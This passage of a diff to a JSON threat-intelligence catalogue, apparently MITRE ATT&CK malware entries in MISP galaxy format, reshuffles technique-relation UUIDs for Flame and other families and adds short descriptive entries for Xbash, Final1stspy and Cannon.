"1c338d0f-a65e-4073-a5c1-c06878849f21", "tags": [ @@ -13130,20 +15027,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -13152,7 +15035,7 @@ "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13166,7 +15049,42 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13192,62 +15110,6 @@ ] }, "related": [ - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -13262,12 +15124,68 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "11e36d5b-6a92-4bf9-8eb7-85eb24f59e22", @@ -13304,14 +15222,14 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13351,27 +15269,6 @@ ], "type": "uses" }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ @@ -13380,14 +15277,14 @@ "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13408,21 +15305,14 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13436,7 +15326,35 @@ "type": "uses" }, { - "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13470,6 +15388,62 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -13484,55 +15458,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ @@ -13540,20 +15465,6 @@ ], "type": "uses" }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -13562,28 +15473,14 @@ "type": "uses" }, { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13597,14 +15494,42 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13616,13 +15541,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "e9595678-d269-469e-ae6b-75e49259de63", @@ -13700,6 +15618,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "36675cd3-fe00-454c-8516-aebecacbe9d9", "tags": [ @@ -13708,7 +15633,7 @@ "type": "uses" }, { - "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13727,13 +15652,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "f36b2598-515f-4345-84e5-5ccde253edbe", @@ -13774,20 +15692,6 @@ ], "type": "uses" }, - { - "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -13796,7 +15700,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13810,42 +15714,7 @@ "type": "uses" }, { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13859,7 +15728,14 @@ "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13872,6 +15748,41 @@ ], "type": "uses" }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ @@ -13879,6 +15790,27 @@ ], "type": "uses" }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ @@ -13893,26 +15825,19 @@ ], "type": "uses" }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "a5528622-3a8a-4633-86ce-8cdaf8423858", @@ -13949,7 +15874,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13963,14 +15888,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14018,14 +15943,14 @@ "type": "uses" }, { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14059,14 +15984,7 @@ "type": "uses" }, { - "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14080,7 +15998,14 @@ "type": "uses" }, { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14129,14 +16054,7 @@ "type": "uses" }, { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14150,7 +16068,14 @@ "type": "uses" }, { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14195,14 +16120,21 @@ "type": "uses" }, { - "dest-uuid": "51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "dest-uuid": "52d40641-c480-4ad5-81a3-c80ccaddf82d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14215,20 +16147,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "52d40641-c480-4ad5-81a3-c80ccaddf82d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ @@ -14236,23 +16154,302 @@ ], "type": "uses" }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + } + ], + "uuid": "ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "value": "Flame - S0143" + }, + { + "description": "[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)", + "meta": { + "external_id": "S0341", + "mitre_platforms": [ + "Windows", + "Linux" + ], + "refs": [ + "https://attack.mitre.org/software/S0341", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" + ], + "synonyms": [ + "Xbash" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" }, { - "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" } ], - "uuid": "ff6840c9-4c87-4d07-bbb6-9f50aa33d498", - "value": "Flame - S0143" + "uuid": "6a92d80f-cc65-45f6-aa66-3cdea6786b3c", + "value": "Xbash - S0341" + }, + { + "description": "[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)", + "meta": { + "external_id": "S0355", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0355", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ], + "synonyms": [ + "Final1stspy" + ] + }, + "related": [ + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "a2282af0-f9dd-4373-9b92-eaf9e11e0c71", + "value": "Final1stspy - S0355" + }, + { + "description": "[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)", + "meta": { + "external_id": "S0351", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0351", + 